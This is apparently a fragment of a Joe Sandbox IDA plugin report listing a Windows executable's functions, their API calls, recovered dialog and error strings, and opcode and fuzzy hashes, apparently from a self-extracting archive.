                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B6C04A,00000008,?,00000000,?,00B6E685,?,00000000), ref: 00B721BF
                    Strings
                    • Thread pool initialization failed., xrefs: 00B721D7
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                    • String ID: Thread pool initialization failed.
                    • API String ID: 3340455307-2182114853
                    • Opcode ID: f48ae58934cd21ebc94cfc088bb8636f2a507a8a4f044871f51892911281d1e9
                    • Instruction ID: 38c0b860294644fea669b21a751687868e7ea1a1b7143af47444d57e79ac9b61
                    • Opcode Fuzzy Hash: f48ae58934cd21ebc94cfc088bb8636f2a507a8a4f044871f51892911281d1e9
                    • Instruction Fuzzy Hash: 7711CEB1604709AFC3214F6ADC84AA7FBECFB55358F50886EF2EAD3200DA7059408B60
                    APIs
                      • Part of subcall function 00B612F6: GetDlgItem.USER32(00000000,00003021), ref: 00B6133A
                      • Part of subcall function 00B612F6: SetWindowTextW.USER32(00000000,00B945F4), ref: 00B61350
                    • EndDialog.USER32(?,00000001), ref: 00B7C4AE
                    • GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 00B7C4C6
                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 00B7C4F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ItemText$DialogWindow
                    • String ID: GETPASSWORD1
                    • API String ID: 445417207-3292211884
                    • Opcode ID: 797ed91aecb2ca91b523bab767760fad776ea0c40839b0ec978768dc86accffa
                    • Instruction ID: 72c2e061487d5f4097bdd776b86000939e86e33de0ff4367cb1cc9c351d7bb50
                    • Opcode Fuzzy Hash: 797ed91aecb2ca91b523bab767760fad776ea0c40839b0ec978768dc86accffa
                    • Instruction Fuzzy Hash: A011C872600118BADB205A649C99FFB3BACEB49714F0484ADFB1DF6180C674AD429664
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID:
                    • String ID: RENAMEDLG$REPLACEFILEDLG
                    • API String ID: 0-56093855
                    • Opcode ID: 64496ce93b2bcf6a3a3406b65bc70e7e95d7c3d0dd9c5ac844717117a482671b
                    • Instruction ID: 1b1e563c8ade6f03b78be3cd443f38b3f92de27b491cdedd4692ba079c86a346
                    • Opcode Fuzzy Hash: 64496ce93b2bcf6a3a3406b65bc70e7e95d7c3d0dd9c5ac844717117a482671b
                    • Instruction Fuzzy Hash: FB015271504244ABDB615F18EC89E573BE4EB0D794B0044A5F529D3270DB71E890DBA1
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 00B6495C
                      • Part of subcall function 00B7FD1D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B7FD29
                      • Part of subcall function 00B7FD1D: ___delayLoadHelper2@8.DELAYIMP ref: 00B7FD4F
                    • std::_Xinvalid_argument.LIBCPMT ref: 00B64967
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
                    • String ID: string too long$vector too long
                    • API String ID: 2355824318-1617939282
                    • Opcode ID: 5b0718a67a7f861a04a94dd647d6cfdaacc38d17286c7623e5c3193b6d1b4b95
                    • Instruction ID: 46fef1ba4bc0d28f0efb9f3044cf943d34e9d37c35c873fe41967cb6fa0bad0a
                    • Opcode Fuzzy Hash: 5b0718a67a7f861a04a94dd647d6cfdaacc38d17286c7623e5c3193b6d1b4b95
                    • Instruction Fuzzy Hash: 39F0A0712407046F8734AF59FC85C4BB3EDEF86B5076109AAFA45C3642D7B0E9048BB5
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: __alldvrm$_strrchr
                    • String ID:
                    • API String ID: 1036877536-0
                    • Opcode ID: 11928e2537a4dd367eb88350d438216194463e35c46b68634b5d5fb98095dd98
                    • Instruction ID: 3bd8f5544889ade69c24ab79395a7435d92ca11c7694f3c93a989ce9303ee8b7
                    • Opcode Fuzzy Hash: 11928e2537a4dd367eb88350d438216194463e35c46b68634b5d5fb98095dd98
                    • Instruction Fuzzy Hash: 68A14A71A003869FFB12EF18C8917AEBBE5EF11311F2845EEE4859B2A1C6388D41C752
                    APIs
                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00B68D5C,?,?,?), ref: 00B6B7F3
                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,00B68D5C,?,?), ref: 00B6B837
                    • SetFileTime.KERNEL32(?,00B68AEC,?,00000000,?,00000800,?,00B68D5C,?,?,?,?,?,?,?,?), ref: 00B6B8B8
                    • CloseHandle.KERNEL32(?,?,00000800,?,00B68D5C,?,?,?,?,?,?,?,?,?,?), ref: 00B6B8BF
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: File$Create$CloseHandleTime
                    • String ID:
                    • API String ID: 2287278272-0
                    • Opcode ID: cffffe8e6034d925034b59047763884c62028ad4391ab654e8a132eca33b17ff
                    • Instruction ID: 615f577013a3aa775504bddd05c2e64222fdbf84671394c0ec497ce53dbdfe92
                    • Opcode Fuzzy Hash: cffffe8e6034d925034b59047763884c62028ad4391ab654e8a132eca33b17ff
                    • Instruction Fuzzy Hash: FA41E031248381AAE731DF24DC55FAABBF8AB85300F0409ADF6D1D3191D768DE88DB52
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _wcslen
                    • String ID:
                    • API String ID: 176396367-0
                    • Opcode ID: 812f55104c914db2c6043254674beb7ae438ef9b83ff207bbe3a56b0f632a3ac
                    • Instruction ID: b736ca405e4fcf0db1ac05018dc4d0b8530f5677d5c627cb126f48254dc79d4c
                    • Opcode Fuzzy Hash: 812f55104c914db2c6043254674beb7ae438ef9b83ff207bbe3a56b0f632a3ac
                    • Instruction Fuzzy Hash: 3541A3719006259BCB11AF6C8C599EE7BF8EF05310F040469FA09F7255DF34AE498BE4
                    APIs
                    • _wcslen.LIBCMT ref: 00B68532
                    • _wcslen.LIBCMT ref: 00B68558
                    • _wcslen.LIBCMT ref: 00B685EF
                    • _wcslen.LIBCMT ref: 00B68657
                      • Part of subcall function 00B6B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B6B991
                      • Part of subcall function 00B6B41F: RemoveDirectoryW.KERNEL32(?,?,?,00B68649,?), ref: 00B6B430
                      • Part of subcall function 00B6B41F: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,00B68649,?), ref: 00B6B45E
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _wcslen$DirectoryRemove$CloseFind
                    • String ID:
                    • API String ID: 973666142-0
                    • Opcode ID: e0f50f7b53dfb6e5f5ef76ba58ffa1aa3b18ce34434ecafa38cc78c1fb134bab
                    • Instruction ID: 04bd82986c70c9a8fe9a311ee609f9c8967816657255571022113ffa401b16b4
                    • Opcode Fuzzy Hash: e0f50f7b53dfb6e5f5ef76ba58ffa1aa3b18ce34434ecafa38cc78c1fb134bab
                    • Instruction Fuzzy Hash: 1631B2729002549ACF21AF64CC41AEA33E5EF55384F0445EAF94AA7155EF78CEC4CB90
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,62E85006,00B85AD4,00000000,00000000,00B86B09,?,00B86B09,?,00000001,00B85AD4,62E85006,00000001,00B86B09,00B86B09), ref: 00B8DB95
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B8DC1E
                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00B8DC30
                    • __freea.LIBCMT ref: 00B8DC39
                      • Part of subcall function 00B8A7FE: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B85594,?,0000015D,?,?,?,?,00B86A70,000000FF,00000000,?,?), ref: 00B8A830
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                    • String ID:
                    • API String ID: 2652629310-0
                    • Opcode ID: 2a6a6a145673e8074ecf16dc24073e9871a14d2611c3cd12d5f9569d44479dbb
                    • Instruction ID: 0cf70daaf9f69574786ce9bc8aaeb0c02ac90a3491fb811809ebc22717aa950f
                    • Opcode Fuzzy Hash: 2a6a6a145673e8074ecf16dc24073e9871a14d2611c3cd12d5f9569d44479dbb
                    • Instruction Fuzzy Hash: D131C372A0021AABDF25AF65CC45DAE7BE5EF44720F0541AAFC04D71A0EB35DD91CB90
                    APIs
                    • GetDC.USER32(00000000), ref: 00B7B676
                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B7B685
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B7B693
                    • ReleaseDC.USER32(00000000,00000000), ref: 00B7B6A1
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: CapsDevice$Release
                    • String ID:
                    • API String ID: 1035833867-0
                    • Opcode ID: 27aeb138dd6e55330ca737ad6379f2a2b98454cc1404d344927066cb12012fe9
                    • Instruction ID: 417bf00eef2bcfd93a3812958b610526e9e60d715fa7eb0bf8e0e6f65a555a55
                    • Opcode Fuzzy Hash: 27aeb138dd6e55330ca737ad6379f2a2b98454cc1404d344927066cb12012fe9
                    • Instruction Fuzzy Hash: B8E0EC71989A61ABD7311B60AC1EF9A7B54EB1E712F084005FA05A7290CFB058808FE1
                    APIs
                      • Part of subcall function 00B7B6A9: GetDC.USER32(00000000), ref: 00B7B6AD
                      • Part of subcall function 00B7B6A9: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B7B6B8
                      • Part of subcall function 00B7B6A9: ReleaseDC.USER32(00000000,00000000), ref: 00B7B6C3
                    • GetObjectW.GDI32(?,00000018,?), ref: 00B7B84C
                      • Part of subcall function 00B7BADE: GetDC.USER32(00000000), ref: 00B7BAE7
                      • Part of subcall function 00B7BADE: GetObjectW.GDI32(?,00000018,?), ref: 00B7BB16
                      • Part of subcall function 00B7BADE: ReleaseDC.USER32(00000000,?), ref: 00B7BBAE
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ObjectRelease$CapsDevice
                    • String ID: (
                    • API String ID: 1061551593-3887548279
                    • Opcode ID: 6bea1968ea44e540473841e78796adc0669d22773d3790e0df79275a218d469c
                    • Instruction ID: 5b7f63b01b62452ed7cb5156ef4e429f33a440dfe0d02d2584af6eb258b5ec81
                    • Opcode Fuzzy Hash: 6bea1968ea44e540473841e78796adc0669d22773d3790e0df79275a218d469c
                    • Instruction Fuzzy Hash: E791C071608354AFD620DF25D844E2BBBE8FF89704F00895EF59AD3260DB30A846CF62
                    APIs
                    • __EH_prolog.LIBCMT ref: 00B680C3
                      • Part of subcall function 00B71907: _wcslen.LIBCMT ref: 00B7190D
                      • Part of subcall function 00B6B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B6B991
                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B68262
                      • Part of subcall function 00B6B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B6B5B5,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B8FA
                      • Part of subcall function 00B6B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B6B5B5,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B92B
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                    • String ID: :
                    • API String ID: 3226429890-336475711
                    • Opcode ID: 2a1954082f7dac48d2cc0f60dee71ca1826d03e5c1314dbd07f9ac40f992e07d
                    • Instruction ID: 48eca7d7f42d9246fa00b65a6fc7ec0e7abe8f59049d13e9531d739a4be2e690
                    • Opcode Fuzzy Hash: 2a1954082f7dac48d2cc0f60dee71ca1826d03e5c1314dbd07f9ac40f992e07d
                    • Instruction Fuzzy Hash: F5511E71800558AAEB25EB54CC56EEE73FDEF46300F0041E5B609B7092DB785F8ACE61
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _wcslen
                    • String ID: }
                    • API String ID: 176396367-4239843852
                    • Opcode ID: 3b9b2d251cd0edca3d10fdbb2c3ce3bf9e5992204502d3c4d6c1d60a1225c799
                    • Instruction ID: 281a56008a4e8ca71867a25babeba98e47a3e0e60e832fa8b45be0b955e3fc11
                    • Opcode Fuzzy Hash: 3b9b2d251cd0edca3d10fdbb2c3ce3bf9e5992204502d3c4d6c1d60a1225c799
                    • Instruction Fuzzy Hash: 822135325043065AD734EF64C842A6BBBECDF81750F1044AEF648C7141EF61EE4887A2
                    APIs
                      • Part of subcall function 00B70627: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B70646
                      • Part of subcall function 00B70627: GetProcAddress.KERNEL32(00BAA1F0,CryptUnprotectMemory), ref: 00B70656
                    • GetCurrentProcessId.KERNEL32(?,00000200,?,00B70697), ref: 00B7072A
                    Strings
                    • CryptProtectMemory failed, xrefs: 00B706E1
                    • CryptUnprotectMemory failed, xrefs: 00B70722
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AddressProc$CurrentProcess
                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                    • API String ID: 2190909847-396321323
                    • Opcode ID: 7cfbabcb961f961656f9baba053b66fa9b13a993547e12dfeb62f653b042f6b3
                    • Instruction ID: e0743d0fbb727fb6ef9b903d9334041cac351df6db53ab2255e1cd67812f81ee
                    • Opcode Fuzzy Hash: 7cfbabcb961f961656f9baba053b66fa9b13a993547e12dfeb62f653b042f6b3
                    • Instruction Fuzzy Hash: 92112931A14264EBDF196F20DC81E6E3BE4EF41764B0581D7FC296B251DB30AD42CAD5
                    APIs
                    • _swprintf.LIBCMT ref: 00B6CDE7
                      • Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: __vswprintf_c_l_swprintf
                    • String ID: %c:\
                    • API String ID: 1543624204-3142399695
                    • Opcode ID: e77057e491ecf08f86ef0c3d2c0be5a5d99b9274aad462b49e6274d1aa040ea1
                    • Instruction ID: c78ce9ba80c41fee3a6bb7bc849ec4f26445a2a87423d819836efb97bf8b15e8
                    • Opcode Fuzzy Hash: e77057e491ecf08f86ef0c3d2c0be5a5d99b9274aad462b49e6274d1aa040ea1
                    • Instruction Fuzzy Hash: 3C01F5635047117ADA206B799C86D7BAFFCEF95770B54849AF484C6092EA39E840C2E1
                    APIs
                    • VirtualQuery.KERNEL32(80000000,00B7F774,0000001C,00B7F969,00000000,?,?,?,?,?,?,?,00B7F774,00000004,00BC3D24,00B7F9F9), ref: 00B7F840
                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00B7F774,00000004,00BC3D24,00B7F9F9), ref: 00B7F85B
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: InfoQuerySystemVirtual
                    • String ID: D
                    • API String ID: 401686933-2746444292
                    • Opcode ID: 51dbbe8adafcac9398ea81d2626ee7b37a0033eb5798a726588f3322bffecd50
                    • Instruction ID: 9c54e70b00088ba7bf2b59b2c099af12c9ba8fce01f8483bbf57d26b2d9e1504
                    • Opcode Fuzzy Hash: 51dbbe8adafcac9398ea81d2626ee7b37a0033eb5798a726588f3322bffecd50
                    • Instruction Fuzzy Hash: 2001D8726001199BCB14DF25DC05AED7BE9EFC4324F08C175AD69D7154DA34D9018680
                    APIs
                      • Part of subcall function 00B6F608: _swprintf.LIBCMT ref: 00B6F62E
                      • Part of subcall function 00B6F608: _strlen.LIBCMT ref: 00B6F64F
                      • Part of subcall function 00B6F608: SetDlgItemTextW.USER32(?,00BA0274,?), ref: 00B6F6AF
                      • Part of subcall function 00B6F608: GetWindowRect.USER32(?,?), ref: 00B6F6E9
